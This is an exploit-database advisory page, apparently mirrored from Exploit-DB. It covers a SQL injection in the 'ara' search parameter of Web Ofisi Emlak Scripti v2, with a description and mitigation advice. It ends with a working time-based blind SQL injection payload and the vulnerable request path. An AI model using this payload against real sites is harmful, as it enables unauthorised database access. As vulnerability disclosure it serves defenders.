header-logo
Suggest Exploit
vendor:
Emlak Scripti
by:
Ahmet Ümit BAYRAM
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Emlak Scripti
Affected Version From: v2
Affected Version To: v2
Patch Exists: NO
Related CWE: N/A
CPE: a:web_ofisi:emlak_scripti_v2
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2019

Web Ofisi Emlak 2 – ‘ara’ SQL Injection

Web Ofisi Emlak 2 is prone to a SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this vulnerability to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to access or modify data in the back-end database, compromise the system, execute operating system commands, or exploit other vulnerabilities.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered, and special characters should be escaped. Additionally, parameterized queries should be used to prevent SQL injection.
Source

Exploit-DB raw data:

# Exploit Title: Web Ofisi Emlak 2 - 'ara' SQL Injection
# Date: 2019-07-19
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v2.html
# Demo Site: http://demobul.net/emlakv2/
# Version: v2
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

Request: http://localhost/[PATH]/ara.html?ara=
Vulnerable Parameter: ara (GET)
Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z